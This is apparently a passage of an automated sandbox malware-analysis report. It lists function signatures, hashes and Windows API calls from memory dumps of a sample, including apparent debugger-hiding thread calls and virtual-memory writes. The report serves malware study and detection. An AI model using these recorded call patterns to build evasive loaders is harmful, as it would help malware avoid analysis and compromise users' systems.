                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID: +$F$O$p$s
                                                        • API String ID: 4275171209-3113303454
                                                        • Opcode ID: 1e896ee5005e70ef9d603ecd9a3856708b99182ae35418daf456da89dfdc3287
                                                        • Instruction ID: c8290d001d4482e78a3617471f1e64713452166396b2d0cddba05fca4778cb9e
                                                        • Opcode Fuzzy Hash: 1e896ee5005e70ef9d603ecd9a3856708b99182ae35418daf456da89dfdc3287
                                                        • Instruction Fuzzy Hash: 2061C5A26A63424AFF381474CAF473E2556EB5A300F74AE3BCA43D6DC9D96EC1C04123
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: W.E$1.!T
                                                        • API String ID: 1029625771-1435519016
                                                        • Opcode ID: 17f0bd04304c57b0151dc2c4a27f7e6c30faf2a92f358f8cbb536e5a690cc58f
                                                        • Instruction ID: 2a3cb653b2bb8ad52e602b63cf871f51b0ab7a8ccd88391bc8d5cb5dc620a05f
                                                        • Opcode Fuzzy Hash: 17f0bd04304c57b0151dc2c4a27f7e6c30faf2a92f358f8cbb536e5a690cc58f
                                                        • Instruction Fuzzy Hash: 4702C071B44307AEEF343A248D987FE226B9F47764FA44126EC8B675C2D775C885CA02
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • EnumWindows.USER32(023907A8,?,00000000,?,?,0000084D,8166FD38,?,?,00000000,?,00400000,?,00000000,00000000,?), ref: 02390772
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumInformationThreadWindows
                                                        • String ID: 1.!T$g=
                                                        • API String ID: 1954852945-1983186331
                                                        • Opcode ID: 64f2c8c95e42f37157b0b409363103d07314e0a22ab8fe801f649722301a3b01
                                                        • Instruction ID: 6050e1c91e1a3f97473fc44080966a60b0360592546d8f876c0d9658c65c3ab0
                                                        • Opcode Fuzzy Hash: 64f2c8c95e42f37157b0b409363103d07314e0a22ab8fe801f649722301a3b01
                                                        • Instruction Fuzzy Hash: 23418B717853066EEF246A3489E07EF22ABDF87370F648125FD534B2C5DBB0C8848A42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                          • Part of subcall function 02399264: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,02398C63,00000040,023908D5,00000000,00000000,00000000,00000000,?,00000000,00000000,02397003), ref: 0239927F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                                                        • String ID: 1.!T
                                                        • API String ID: 449006233-3147410236
                                                        • Opcode ID: 03a7abbd617cc77d40e92e1a4292a8fd3daa3ab13abcaa83288c502fc692c93b
                                                        • Instruction ID: 17dda1c27b07c282ede5acd4eaffca004c4c6f36e75cde4d57b14d964946a3b6
                                                        • Opcode Fuzzy Hash: 03a7abbd617cc77d40e92e1a4292a8fd3daa3ab13abcaa83288c502fc692c93b
                                                        • Instruction Fuzzy Hash: 44F13B70A18302DEDF249E38C9D47AA779A9F93360F54825ADD934B6D7C731C482CB12
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationThread
                                                        • String ID: 1.!T$r)
                                                        • API String ID: 4046476035-1995433659
                                                        • Opcode ID: e929f64fed07971238fbeeca0e0398902ac12542d34e6705d45705035954de3d
                                                        • Instruction ID: 26c7f4cf6f2ae2a9033ed19f19651ca62d5343ff93e24711e326158c846b2c58
                                                        • Opcode Fuzzy Hash: e929f64fed07971238fbeeca0e0398902ac12542d34e6705d45705035954de3d
                                                        • Instruction Fuzzy Hash: DF31A3B0B593065AEF243A3449E17EF26AB8F97764F744125FD531B2C5DBB0C840CA41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID: V1;t
                                                        • API String ID: 3569954152-2169592536
                                                        • Opcode ID: cc4d2c0cdbac6e0ec68671af36d29bbfab60c91f2094577f9bf970e05eed861f
                                                        • Instruction ID: d766990cc92764e0078964d6b2a08b5d12137f18e13b8d57811bf880047de8b4
                                                        • Opcode Fuzzy Hash: cc4d2c0cdbac6e0ec68671af36d29bbfab60c91f2094577f9bf970e05eed861f
                                                        • Instruction Fuzzy Hash: 88A133F5244305AEEF311E20CD85BF9366AEF06744F604529FE4AA75D1C7B998C8CB02
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID: V1;t
                                                        • API String ID: 3569954152-2169592536
                                                        • Opcode ID: 3ef1c0eebabb734028d3149a9d8baa5b36332f1809be07935841a1c028889e91
                                                        • Instruction ID: e1caaa20267e1c9e7e3560d67e17d9d8ff8793cd79ce508766a259e72b039548
                                                        • Opcode Fuzzy Hash: 3ef1c0eebabb734028d3149a9d8baa5b36332f1809be07935841a1c028889e91
                                                        • Instruction Fuzzy Hash: FCA133B1244305AFEF311E20CD85BF9366AEF06744F604529FE4AA76D1C7B998C8CB02
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID: V1;t
                                                        • API String ID: 3569954152-2169592536
                                                        • Opcode ID: 63435f6bb9c550b086c4dd25932c142e6ef4ac4297e1745385af0efdfd84fb01
                                                        • Instruction ID: c0688ceab4b8982c05707f6d4b045ed24af8948542bd850ef7a2de53aa18cd84
                                                        • Opcode Fuzzy Hash: 63435f6bb9c550b086c4dd25932c142e6ef4ac4297e1745385af0efdfd84fb01
                                                        • Instruction Fuzzy Hash: 779124B1244305AFEF311E24CD85BF9366AEF06744F504529FE8AA75D1C7B988C9CB02
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 1.!T
                                                        • API String ID: 0-3147410236
                                                        • Opcode ID: 1f8a163b3306fb84116997d82d8cf06b9cb58a59f6f721e88b07f111c8fb6c02
                                                        • Instruction ID: 6c1a458bfa8053cf3e4a3c91d673ff9e31e34ccf8ad8dc917221fc52b10fb5a0
                                                        • Opcode Fuzzy Hash: 1f8a163b3306fb84116997d82d8cf06b9cb58a59f6f721e88b07f111c8fb6c02
                                                        • Instruction Fuzzy Hash: 1B814D70784306AFFF246E248D947EA33ABAF57354F548165EE835B1C2D770C885CA41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID: V1;t
                                                        • API String ID: 3569954152-2169592536
                                                        • Opcode ID: c71990972aae7a911636afd88599d32f81744369bec70ae17b341c998436fc12
                                                        • Instruction ID: 3ffca76bcae11500ac75471930d0bef71d48d6539fe1927a0bc0e2339047cb7c
                                                        • Opcode Fuzzy Hash: c71990972aae7a911636afd88599d32f81744369bec70ae17b341c998436fc12
                                                        • Instruction Fuzzy Hash: 329122B5244309AFEF311E24CD85BF9766AFF06344F504529FE8A97691C7B988C8CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID: V1;t
                                                        • API String ID: 3569954152-2169592536
                                                        • Opcode ID: b19035c4b0fba08852616cd3a2fc0fa90600067dc503e414bf81f9921e235316
                                                        • Instruction ID: 2bf975c0e4a4396ff57fde347ee5d88409c90677cba5ba6dc5182d523fbd86af
                                                        • Opcode Fuzzy Hash: b19035c4b0fba08852616cd3a2fc0fa90600067dc503e414bf81f9921e235316
                                                        • Instruction Fuzzy Hash: EC9121B1244309AFEF311E24CD85BF9766AFF06344F504529FE8A97691C7B988C8CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID: V1;t
                                                        • API String ID: 3569954152-2169592536
                                                        • Opcode ID: 6ab21de5792d30442009ef717ad16ed33ae4c11c95390d965f04e9b9a3880794
                                                        • Instruction ID: a35b65287823beeeccafc36fb05e8a2563dea3aaf669229698be81eb05bcfbea
                                                        • Opcode Fuzzy Hash: 6ab21de5792d30442009ef717ad16ed33ae4c11c95390d965f04e9b9a3880794
                                                        • Instruction Fuzzy Hash: A08132B1204309AFEF311E24CD85BF9766AEF06344F504529FE8A97691C7B988C8CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationThread
                                                        • String ID: 1.!T
                                                        • API String ID: 4046476035-3147410236
                                                        • Opcode ID: 17f779f41933df9a25ee3e771d8c8dcd3ca574c7a0c67db71e9640e07f165569
                                                        • Instruction ID: 6b40db1612c9d7308ce85645a90af44f01fd9aeceeb4bd0cf9810294e146b38a
                                                        • Opcode Fuzzy Hash: 17f779f41933df9a25ee3e771d8c8dcd3ca574c7a0c67db71e9640e07f165569
                                                        • Instruction Fuzzy Hash: 1A71D171B493076EEF2526384CA07FB27AB9F933A0FA84129EDC7172C6D7758842C651
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID: V1;t
                                                        • API String ID: 3569954152-2169592536
                                                        • Opcode ID: 7d444c4bccb3e104db2a3da6ca338d80d0d2803b6f94877317f419c68d9fe3d2
                                                        • Instruction ID: f276a2a9661f36d07fdf7d90c52a2304cddf90a15551b24223f87c06cc421bc9
                                                        • Opcode Fuzzy Hash: 7d444c4bccb3e104db2a3da6ca338d80d0d2803b6f94877317f419c68d9fe3d2
                                                        • Instruction Fuzzy Hash: 018124B1244309AFEF311E24CD85BF9766AFF06344F544529FE8A97691C7B988C8CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationLibraryLoadThread
                                                        • String ID: 1.!T
                                                        • API String ID: 543350213-3147410236
                                                        • Opcode ID: 92fb4aa0c062667544b4755f682e1af5c81202fdbc688727cf212d3ef3d49e79
                                                        • Instruction ID: 46b65379241e3cc9103b33519a7910727b0e328e61223c2c51599382cc10837c
                                                        • Opcode Fuzzy Hash: 92fb4aa0c062667544b4755f682e1af5c81202fdbc688727cf212d3ef3d49e79
                                                        • Instruction Fuzzy Hash: 76619F70745302AEEF3429388D947FB22AB9FC7364FA44626ED53476C5D774C881CA52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationThread
                                                        • String ID: 1.!T
                                                        • API String ID: 4046476035-3147410236
                                                        • Opcode ID: 5da65cb7fe63a05e179f33991177f6dd424967d17b1e5ca1cc380c7b406df530
                                                        • Instruction ID: a73606a21529aa666bfd2720d3e0ebbe6da55aafe925eb310b32499aed3c3a52
                                                        • Opcode Fuzzy Hash: 5da65cb7fe63a05e179f33991177f6dd424967d17b1e5ca1cc380c7b406df530
                                                        • Instruction Fuzzy Hash: D7519C71B843066AFF352A348D90BEF22AB9F97760FA40135FD46272C1DBB18C81CA41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                          • Part of subcall function 02394B66: LdrInitializeThunk.NTDLL(-0000CFB3,?,-0000CFB3,02392119,001807C7,00000000,001807C7,0000003A,00000309,C781D084,02395B59,0239382E,?,0000084D,8166FD38), ref: 023957AE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationInitializeThreadThunk
                                                        • String ID: 1.!T
                                                        • API String ID: 1629277043-3147410236
                                                        • Opcode ID: 237ab68927ba339af096a3809a990e9f0e13f0f6c085a21e515b76b7afd0f257
                                                        • Instruction ID: 1c26d13d286bf94bc6678a2fb1528222da266c0a9c36ff68dca12764dfb4a18a
                                                        • Opcode Fuzzy Hash: 237ab68927ba339af096a3809a990e9f0e13f0f6c085a21e515b76b7afd0f257
                                                        • Instruction Fuzzy Hash: A0516D71B4430BAEEF343A248DA07EF36BBDF973A0F904116ED861B185D7708881DA42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationThread
                                                        • String ID: 1.!T
                                                        • API String ID: 4046476035-3147410236
                                                        • Opcode ID: 8ae7513efd174aa85af3c0d99ca43bd1723210cb153a70799e3dfc2a5bb5f1b3
                                                        • Instruction ID: 3894f235cad78f691a3f9e63f41cc1add9fcedde06494652be5843652ea7bc9a
                                                        • Opcode Fuzzy Hash: 8ae7513efd174aa85af3c0d99ca43bd1723210cb153a70799e3dfc2a5bb5f1b3
                                                        • Instruction Fuzzy Hash: 4E51AC71B45306AEEF342A348DD17EF22AB9F83750FA44125FD565B2C5EBB4C881CA41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID: A f=
                                                        • API String ID: 3569954152-1366173332
                                                        • Opcode ID: 0807338cf3cd9c192f69007c888f4f9bb215a73413b0c7932382b8e560d92717
                                                        • Instruction ID: 126892035d6fe3ef310ca1eb199bdf162fbed7d47016f7cff16d1b42ea5e08c7
                                                        • Opcode Fuzzy Hash: 0807338cf3cd9c192f69007c888f4f9bb215a73413b0c7932382b8e560d92717
                                                        • Instruction Fuzzy Hash: 245102B0244308AFEF751E24CD86BF9366AFF06304F144569FE8AD6591C7B988C8CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationThread
                                                        • String ID: 1.!T
                                                        • API String ID: 4046476035-3147410236
                                                        • Opcode ID: bd2c02064287cc20e45608a9aff855a96897980dc93f88fd8b81c6e97cbf1ec5
                                                        • Instruction ID: 0d226887549843e1d3272a261ca0ae60a3817a2106128ffde586f15b0514a686
                                                        • Opcode Fuzzy Hash: bd2c02064287cc20e45608a9aff855a96897980dc93f88fd8b81c6e97cbf1ec5
                                                        • Instruction Fuzzy Hash: 914147B0754306AEEF246A2489E0BEA22AB9F97360FA44125ED524B2C5D770CC80CE41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationThread
                                                        • String ID: 1.!T
                                                        • API String ID: 4046476035-3147410236
                                                        • Opcode ID: 32be66ca157e21ba996c27aded9a342f8960d6c6525958bf59e95fd72fb30bec
                                                        • Instruction ID: a71e78e6f64767227e30828299c6fe7c1efa41921411b8a05665b80c4e5e6bdd
                                                        • Opcode Fuzzy Hash: 32be66ca157e21ba996c27aded9a342f8960d6c6525958bf59e95fd72fb30bec
                                                        • Instruction Fuzzy Hash: 37418D757853069AEF247B2489D17EF33A79F93360FA44026ED121B2C5DB71C885CA82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationThread
                                                        • String ID: 1.!T
                                                        • API String ID: 4046476035-3147410236
                                                        • Opcode ID: ab4c1908473bfd67d4c4ae34b24fafabc7b7a97bc771644eb0f67cd20e230580
                                                        • Instruction ID: 88e484fe0d3e0929c52b8c7ba131481cf29fa8b6603a5cc04f16323d5722b699
                                                        • Opcode Fuzzy Hash: ab4c1908473bfd67d4c4ae34b24fafabc7b7a97bc771644eb0f67cd20e230580
                                                        • Instruction Fuzzy Hash: AA4148B478530A9EEF346A248DA07EF32AB9F47360FA44126ED565B2C5D7B0CC81CA41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationLibraryLoadThread
                                                        • String ID: 1.!T
                                                        • API String ID: 543350213-3147410236
                                                        • Opcode ID: 7aa21d3337307f5090f3189448cd1c9152f11cb949592ae3a27146fdbde28246
                                                        • Instruction ID: af25aa529f28fef5f4fb17542c63b29849d4e84ecb17b81ec27d68bafe6956bb
                                                        • Opcode Fuzzy Hash: 7aa21d3337307f5090f3189448cd1c9152f11cb949592ae3a27146fdbde28246
                                                        • Instruction Fuzzy Hash: 12316FB0B493066EEF242A3489917EF26AB9F97364F744125ED535B2C5DB70CC40CA81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationLibraryLoadThread
                                                        • String ID: 1.!T
                                                        • API String ID: 543350213-3147410236
                                                        • Opcode ID: 35089c31494100f04615fe04017fb476b12c69e69e469a9dc016a08fc5708bc2
                                                        • Instruction ID: e4d68259fa4ca850d28a9d5af9eed9f085b8ba2fabeade6d1ba6f6125be4d11d
                                                        • Opcode Fuzzy Hash: 35089c31494100f04615fe04017fb476b12c69e69e469a9dc016a08fc5708bc2
                                                        • Instruction Fuzzy Hash: 5F2138B57953066AFF242A344DE17EE22AB8F97764FA40125FE525B2C4DBB0C884CA41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationThread
                                                        • String ID: 1.!T
                                                        • API String ID: 4046476035-3147410236
                                                        • Opcode ID: 9ded97cad18d6e254f01c7355c9924557c7479bcccee8786f3c72cae2b7d6e97
                                                        • Instruction ID: d4babbe5d69f6dbdba177389bdc78f5638e04e5d8c93ef75fedaf57a0e4fe166
                                                        • Opcode Fuzzy Hash: 9ded97cad18d6e254f01c7355c9924557c7479bcccee8786f3c72cae2b7d6e97
                                                        • Instruction Fuzzy Hash: 13213DB57953055EEF242A3449E07EF269B4F47364F644225ED235B2C1DB70C884CA41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: e63492068f10140338ae8c77ed5341efc38e9fbfc2db5201cdcc45b50a613f4e
                                                        • Instruction ID: 56a275f16c13599c0fe714f10834be769364d2d26647924788ed085b81c306a2
                                                        • Opcode Fuzzy Hash: e63492068f10140338ae8c77ed5341efc38e9fbfc2db5201cdcc45b50a613f4e
                                                        • Instruction Fuzzy Hash: 95919031A44307AEDF3839644D987FE215F8F83764FB44526DC8BA7581DB66C8C6C912
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadProcessTerminate
                                                        • String ID:
                                                        • API String ID: 3349790660-0
                                                        • Opcode ID: a8dc549b20de86916fde567d78925fcf032ffe8258dc9dbfc35461dd3f73f50d
